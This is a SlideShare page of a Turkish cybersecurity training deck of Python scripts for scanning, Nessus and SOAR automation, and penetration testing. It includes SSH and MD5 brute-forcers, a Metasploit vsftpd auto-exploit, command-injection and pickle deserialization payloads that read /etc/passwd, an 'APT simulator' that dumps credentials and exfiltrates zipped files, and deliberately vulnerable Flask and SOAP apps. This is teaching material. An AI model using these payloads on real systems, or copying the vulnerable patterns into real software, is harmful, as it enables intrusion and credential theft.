SlideShare une entreprise Scribd logo

uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx

Télécharger en tant que PPTX, PDF
A
anilyelken

This document discusses several Python scripts for cyber security tasks like network scanning, password cracking, web application testing, and more. It includes code snippets to perform port scanning with socket programming, Caesar cipher encryption/decryption, website content monitoring, Nmap automation, Rainbow table creation, Metasploit integration, and wireless network scanning. The document aims to demonstrate how Python can be used to automate common security operations and pentesting techniques.

Technologie
1  sur  70
Uygulamalarla Siber Güvenlik https://github.com/kaleakademi https://github.com/anil-yelken/cyber-security-tools Anıl Yelken 29.11.2022 Siber Güvenlik Haftası
ENVANTER YÖNETIMI # -*- coding: utf-8 -*- import socket import subprocess banner_liste=[] IP=raw_input("Ip adresini giriniz:") baslangic_port=input("Baslangic port:") bitis_port=input("Bitis port:") for port in range(baslangic_port,bitis_port): try: soket = socket.socket() soket.connect((IP,port)) banner=str(soket.recv(1024)) print "[+]Port:",str(port) print "[+]Banner:",banner banner_liste.append(str(banner)) https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
ENVANTER YÖNETIMI if port == 22: print "Bu sistem linux veya bir ağ cihazı olabilir" dosya= open("linux.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("linux.txt","a") veri= IP+"n" dosya.write(veri) dosya.close() print "Yeni IP adresi kontrolü" dosya = open("yeni_ip.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("yeni_ip.txt","a") veri = IP+"n" dosya.write(veri) dosya.close() https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
CEASER ŞIFRELEME def ceasarSifreleme(yazi,otelemeMiktari): sifreyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for i in yaziListe: yaziSayi = ord(i) + otelemeMiktari sifreyazi = sifreyazi + chr(yaziSayi) return sifreyazi https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
CEASER ŞIFRELEME def ceasarSifreCoz(yazi): duzyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for otelemeMiktari in range(1,29): for i in yaziListe: yaziSayi = ord(i) - otelemeMiktari duzyazi = duzyazi + chr(yaziSayi) print str(otelemeMiktari)+" harf kadar ötelenmiş düz metin : "+ duzyazi duzyazi="" print "----Sezar Şifreleme----" ceasarSifre=ceasarSifreleme("merhaba",3) print "Şifreli metin : "+ceasarSifre print "----Sezar Şifre Çözme----" ceasarSifreCoz(ceasarSifre) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
IÇERIK KONTROLÜ # -*- coding: utf-8 -*- import requests import smtplib import time while 1: time.sleep(60) response=requests.get('https://a.wordpress.com') responseIcerik=response.content kontrol = 0 dosya = open('icerik.txt','r') dosyaIcerik=dosya.readlines() dosya.close() for i in dosyaIcerik: if str(i).split("n")[0] in responseIcerik: kontrol = kontrol + 1 https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
IÇERIK KONTROLÜ if len(dosyaIcerik) == kontrol: print "Web sayfasında değişiklik yok." else: print "Web sayfasında değişiklik yapılmıştır." try: gonderici = 'a@gmail.com' alici = 'a@gmail.com' mesaj = 'Web sayfasının içeriği değişti' username = 'a@gmail.com' password = '*****' server = smtplib.SMTP('smtp.gmail.com:587') server.starttls() server.login(username, password) server.sendmail(gonderici, alici, mesaj) server.quit() print "Mail gönderildi" except: print "Mail gönderilemedi" https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
HASH KONTROLÜ import itertools import hashlib karakterSeti='abcdefghijklmnoprstuvyz' karakter=raw_input("Max kac karakter olacak: ") md5=raw_input("Md5 giriniz: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakt erSeti,i) for password in sonuc: if md5==hashlib.md5(''.join(password)).hexdigest(): print "Sifre: ",str(''.join(password)) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/md5tanSifreye.py
RAINBOW TABLE OLUSTURUCU import itertools import hashlib sozlukListe=[[],[]] karakterSeti='ab12' karakter=raw_input("Max kac karakter olacak: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakterSeti,i) for password in sonuc: sozlukListe[0].append(''.join(password)) sozlukListe[1].append(hashlib.md5(''.join(password)).hexdigest()) #print hashlib.md5(''.join(password)).hexdigest() print "Sozluk:",sozlukListe[0] print "Hashler:",sozlukListe[1] https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/rainbowOlustur.py
SSH KABA KUVVET SALDIRISI import paramiko client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) Username=["siber","guvenlik"] Password=["siber","guvenlik"] for i in Username: for j in Password: try: sonuc=client.connect('192.168.50.50', username=i, password=j) #print sonuc client.close() print "Username: ",i," Password: ",j except: print "Username: ",i," Password: ",j,"baglanti yapilamadi" https://github.com/anil-yelken/siber-guvenlik-icin-python/blob/main/sshBruteForce.py
SSH KONTROL import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy( paramiko.AutoAddPolicy()) ssh.connect('127.0.0.1', username='kali', password='kali') stdin, stdout, stderr = ssh.exec_command("""grep "sudo" /etc/group|cut -d ":" -f4""") print("Sudo grubundaki kullanıcılar:") print(stdout.read()) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/ssh_kontrol.py
OTOMATIK MSFCONSOLE if "vsFTPd 2.3.4" in i: print "[+]Service: ",i print "[+]Metasploit exploit: exploit/unix/ftp/vsftpd_234_backdoor" if automaticExploit == "True": try: rc="""use exploit/unix/ftp/vsftpd_234_backdoor set RHOST rhost set RPORT 21 exploit""" rc=rc.replace("rhost",str(IP)) path=subprocess.check_output("pwd",shell=True).spli tlines()[0] path=path+"/vsFTPd2-3-4.rc" dosya=open(path,"w") dosya.write(rc) dosya.close() komut="xterm -e msfconsole -r "+str(path) subprocess.Popen(komut,shell=True,stdout=subproce ss.PIPE) except: print "Failed to exploit " https://github.com/anil-yelken/automatic-exploit/blob/main/automatic-exploit.py
WEB ZAFIYET TARAMASI def commandInjection(url,dosyaAdi): try: deger = url.find("=") istek = url[:deger + 1] + ";cat%20/etc/passwd" sonuc = requests.get(istek, verify=False) if "www-data" in sonuc.content: print "[+]Command injection possible, payload: ;cat%20/etc/passwd" print "Response: ", sonuc.content rapor = open(dosyaAdi, "a") raporIcerik="[+]Command injection possible, payload: ;cat%20/etc/passwdn" raporIcerik += "Response: " + sonuc.content + "n" rapor.write(raporIcerik) rapor.close() https://github.com/anil-yelken/web-vulnerability-scanner/blob/main/web-vulnerability-scanner.py
NESSUS OTOMASYONU import requests accessKey="8caddd5ad72d86c509982ca2a3229f426883386b0780c114d275fdd8d5829c 97" secretKey="a53754e51fa487075a67832f885a3953cc3854620da3b8212ab3acfcf50901c5 " xapikeys="accessKey="+accessKey+"; secretKey="+secretKey+";" header={"X-ApiKeys":xapikeys} url="https://127.0.0.1:8834/folders" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['folders']: print i['name'] https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/nessus1.py
NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['scans']: #print i if "Host Discovery" in str(i['name']): url="https://127.0.0.1:8834/scans/"+str(i['id']) sonuc= requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: dosya_adi=str(i['name'])+"_ipler.txt" veri=str(j['hostname'])+"n" dosya=open(dosya_adi,"a") dosya.write(veri) dosya.close() https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans/"+str(i['id'])+"/hosts/"+str(j['host_id']) IP_sonuc= requests.get(url=url,headers=header,verify=False) for k in IP_sonuc.json()['vulnerabilities']: plugin_id=k['plugin_id'] url="https://127.0.0.1:8834/plugins/plugin/"+str(plugin_id) plugin_sonuc= requests.get(url=url,headers=header,verify=False) if str(plugin_sonuc.json()['id']) in "11936": for plugin in plugin_sonuc.json()['attributes']: if "os_identification" in plugin['attribute_name']: print str(j['hostname']) print IP_sonuc.json()['info']['operating-system'] https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
NESSUS OTOMASYONU for i in sonuc.json()['scans']: if "Host Discovery" in i['name'] and "completed" in i['status']: url="https://"+IP+":8834/scans/"+str(i['id']) sonuc=requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: if not j['hostname'] in iplerListe: conn=sqlite3.connect('hostDiscovery.db') c=conn.cursor() c.execute('INSERT INTO hosts VALUES (?,?)',(str(j['hostname']),str(datetime.datetime.now()))) conn.commit() conn.close() print "New IP:",j['hostname'] s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((SIEMhost,SIEMport)) message="New host:"+j['hostname'] s.sendall(message) s.close() https://github.com/anil-yelken/Nessus-Automation/blob/main/finding-new-ip-nessus.py
SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU https://github.com/anil-yelken/cyber-security-control-validation- platform
SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: result = sock.connect_ex((vulnerable_ip,8000)) if result == 0: print("Vulnerable SOAP service is running") else: print("Vulnerable SOAP service isn't running") except: pass
SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU print("SOAP SQL injection is testing...") try: result=client.service.query("' or '1=1") #print(result) if "test" in result and "erlik" in result: successful_attack+=1 print("Successful attack") else: unsuccessful_attack+=1 print("Unsuccessful attack") except: unsuccessful_attack+=1 print("Unsuccessful attack") pass print("SOAP SQL injection is finished.")
SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU @rpc(String , _returns=String) def query(ctx, name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name ) data=str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="soap_server.log", filemode='w', level=logging.DEBUG) logging.debug(data) return(data)
BAYANAY - PYTHON WARDRIVING ARACI https://github.com/anil-yelken/wardriving
BAYANAY - PYTHON WARDRIVING ARACI from selenium import webdriver import time import datetime driver = webdriver.Firefox() driver.get("https://www.geody.com") driver.find_element_by_id("cookieChoiceDismiss").click() while 1: driver.find_element_by_xpath("/html/body/table[1]/tbody/tr/td[1]/a").click() time.sleep(10) konum=str(driver.current_url).split("&")[1:] print konum log=str(konum[0])+"|"+str(konum[1])+"|"+str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"n" dosya=open("location.txt","a") dosya.write(log) dosya.close() driver.refresh()
BAYANAY - PYTHON WARDRIVING ARACI from scapy.all import * import datetime ssidListe = [] def SSIDBul(pkt) : if pkt.haslayer(Dot11Beacon) : ssid = str(pkt.info) mac = str(pkt.addr2) if not ssid in ssidListe: ssidListe.append(ssid) print "Mac: ",mac," SSID: ",ssid log=str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"|"+str(mac)+"|"+str(ssid)+"n" dosya=open("ssid.txt","a") dosya.write(log) dosya.close() sniff(iface="wlan0", prn = SSIDBul)
APT SIMULATOR https://github.com/anil-yelken/APT-Simulator
APT SIMULATOR try: ipconfig=subprocess.check_output("ipconfig /all",shell=True) with open("ipconfig.txt", 'wb') as file: file.write(ipconfig) except: pass try: os.system("pip3 install pypykatz") except: pass try: os.system("pypykatz.py rekall dump -t 0") print("pypykatz is finished.") except: pass
APT SIMULATOR try: file_zip = zipfile.ZipFile('file.zip', 'w') for folder, subfolders, files in os.walk('.'): for file in files: if file.endswith('.txt'): file_zip.write(os.path.join(folder, file), os.path.relpath(os.path.join(folder, file), '.'), compress_type=zipfile.ZIP_DEFLATED) file_zip.close() print("Files are compressed.") s = socket.socket() s.connect(("127.0.0.1", 80)) with open("file.zip", "rb") as f: while True: bytes_read = f.read(4096) if not bytes_read: break s.sendall(bytes_read) s.close() print("Zip file sent.") except: pass
APT SIMULATOR import socket s = socket.socket() s.bind(("0.0.0.0", 80)) s.listen() client_socket, address = s.accept() print(f"[+] {address} is connected.") with open("received_file.zip", "wb") as f: while True: bytes_read = client_socket.recv(4096) if not bytes_read: break f.write(bytes_read) client_socket.close() s.close()
PYWIRT https://github.com/anil-yelken/pywirt
PYWIRT import winrm with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw,"-") winrm_session = winrm.Session(IP_address, auth=(user, passw)) try: print("IP Configuration:") result = winrm_session.run_cmd('ipconfig', ['/all']) for result_line in result.std_out.decode('ascii').split("rn"): print(result_line) except: pass
PYLIRT https://github.com/anil-yelken/pylirt
PYLIRT import paramiko with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(IP_address, username=user, password=passw) try: stdin, stdout, stderr = ssh.exec_command("""cat /etc/passwd""") print("/etc/passwd:n",stdout.read().decode()) except: pass
SOAR https://github.com/anil-yelken/SOAR https://www.mshowto.org/acik-kaynak-soar-cozumleri-bolum-1.html
SOAR def send_mail(from_message,to_message,message,username,password,SMTP_server): try: import smtplib server = smtplib.SMTP(SMTP_server) server.starttls() server.login(username, password) server.sendmail(from_message, to_message, message) server.quit() print("Mail sent successfully") except: print("Mail sent failed")
SOAR def send_message(nexmo_key,nexmo_Secret,from_message,to_message,text): try: import nexmo client = nexmo.Client(key=nexmo_key, secret=nexmo_Secret) response = client.send_message( { "from": from_message, "to": to_message, "text": text, } ) if response["messages"][0]["status"] == "0": print("Message sent successfully") else: print("Message sent failed") except: print("Message sent failed")
SOAR def alienvault_control(OTX_key,find_word): from OTXv2 import OTXv2 otx = OTXv2(OTX_key) for i in (otx.getall()): try: id = str(i['id']) except: id = "" try: name = str(i['name']) except: name = "" try: description = str(i['description']) except: description = ""
SOAR def staxx_ip_control(username,password,staxx_URL): import requests import json header = {'Content-Type': 'application/json'} veri = {"username": username, "password": password} url = staxx_URL + '/api/v1/login' response = requests.post(url=url, headers=header, data=json.dumps(veri), verify=False) token = response.json()['token_id'] data = {"token": str(token), "query": "confidence>70", "type": "json", "size": 10} url = staxx_URL + "/api/v1/intelligence" result = requests.post(url=url, headers=header, data=json.dumps(data), verify=False) return result
OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload https://github.com/anil-yelken/Vulnerable-Flask-App
OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP SQL INJECTION
OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
OWASP – VULNERABLE FLASK APP HTML INJECTION
OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
OWASP – VULNERABLE FLASK APP SSTI
OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
OWASP – VULNERABLE FLASK APP COMMAND INJECTION
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP LFI
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
OWASP – VULNERABLE FLASK APP BRUTE FORCE
OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
OWASP – VULNERABLE FLASK APP FILE UPLOAD
OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
OWASP – VULNERABLE FLASK APP DOS
OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
OWASP – VULNERABLE FLASK APP
VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id n# "
VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken

Recommandé

Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploySimon Su
 
PyCon 2013 Test Driven Infrastructure
PyCon 2013 Test Driven InfrastructurePyCon 2013 Test Driven Infrastructure
PyCon 2013 Test Driven InfrastructureSchlomo Schapiro
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
Python para equipos de ciberseguridad
Python para equipos de ciberseguridad Python para equipos de ciberseguridad
Python para equipos de ciberseguridad Jose Manuel Ortega Candel
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxPatricia Aas
 
session6-Network Programming.pptx
session6-Network Programming.pptxsession6-Network Programming.pptx
session6-Network Programming.pptxSrinivasanG52
 
Python build your security tools.pdf
Python build your security tools.pdfPython build your security tools.pdf
Python build your security tools.pdfTECHNOLOGY CONTROL CO.
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 

Recommandé

Nko workshop - node js crud & deploy
Nko workshop - node js crud & deployNko workshop - node js crud & deploy
Nko workshop - node js crud & deploySimon Su
 
PyCon 2013 Test Driven Infrastructure
PyCon 2013 Test Driven InfrastructurePyCon 2013 Test Driven Infrastructure
PyCon 2013 Test Driven InfrastructureSchlomo Schapiro
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
Python para equipos de ciberseguridad
Python para equipos de ciberseguridad Python para equipos de ciberseguridad
Python para equipos de ciberseguridad Jose Manuel Ortega Candel
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxPatricia Aas
 
session6-Network Programming.pptx
session6-Network Programming.pptxsession6-Network Programming.pptx
session6-Network Programming.pptxSrinivasanG52
 
Python build your security tools.pdf
Python build your security tools.pdfPython build your security tools.pdf
Python build your security tools.pdfTECHNOLOGY CONTROL CO.
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Chat code
Chat codeChat code
Chat codemanish bhandare
 
Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Yuriy Senko
 
Jakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix toolsJakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix toolsDevSecCon
 
Service intergration
Service intergration Service intergration
Service intergration 재민 장
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)남균 김
 
Cs pritical file
Cs pritical fileCs pritical file
Cs pritical fileMitul Patel
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Giovanni Bechis
 
Facebook Cracker
Facebook CrackerFacebook Cracker
Facebook CrackerCelia Abela
 
Consider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdfConsider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdfabinayamobiles
 
UDP.yash
UDP.yashUDP.yash
UDP.yashYashpatel821746
 
Best Practices in Handling Performance Issues
Best Practices in Handling Performance IssuesBest Practices in Handling Performance Issues
Best Practices in Handling Performance IssuesOdoo
 
Python Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuidePython Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuideMihai Catalin Teodosiu
 
Introduction to GitHub Actions
Introduction to GitHub ActionsIntroduction to GitHub Actions
Introduction to GitHub ActionsBo-Yi Wu
 
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswiftmacOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswiftTomohiro Kumagai
 
Controlling robots using javascript
Controlling robots using javascriptControlling robots using javascript
Controlling robots using javascriptSudar Muthu
 
Princeton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance ToolingPrinceton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance ToolingHenry Schreiner
 
iOS build that scales
iOS build that scalesiOS build that scales
iOS build that scalesTobias Hutzler
 
Writing and Publishing Puppet Modules - PuppetConf 2014
Writing and Publishing Puppet Modules - PuppetConf 2014Writing and Publishing Puppet Modules - PuppetConf 2014
Writing and Publishing Puppet Modules - PuppetConf 2014Puppet
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisFIWARE
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Contenu connexe

Similaire à uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx

Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Yuriy Senko
 
Jakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix toolsJakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix toolsDevSecCon
 
Service intergration
Service intergration Service intergration
Service intergration 재민 장
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)남균 김
 
Cs pritical file
Cs pritical fileCs pritical file
Cs pritical fileMitul Patel
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Giovanni Bechis
 
Facebook Cracker
Facebook CrackerFacebook Cracker
Facebook CrackerCelia Abela
 
Consider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdfConsider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdfabinayamobiles
 
Best Practices in Handling Performance Issues
Best Practices in Handling Performance IssuesBest Practices in Handling Performance Issues
Best Practices in Handling Performance IssuesOdoo
 
Python Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuidePython Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuideMihai Catalin Teodosiu
 
Introduction to GitHub Actions
Introduction to GitHub ActionsIntroduction to GitHub Actions
Introduction to GitHub ActionsBo-Yi Wu
 
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswiftmacOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswiftTomohiro Kumagai
 
Controlling robots using javascript
Controlling robots using javascriptControlling robots using javascript
Controlling robots using javascriptSudar Muthu
 
Princeton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance ToolingPrinceton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance ToolingHenry Schreiner
 
Writing and Publishing Puppet Modules - PuppetConf 2014
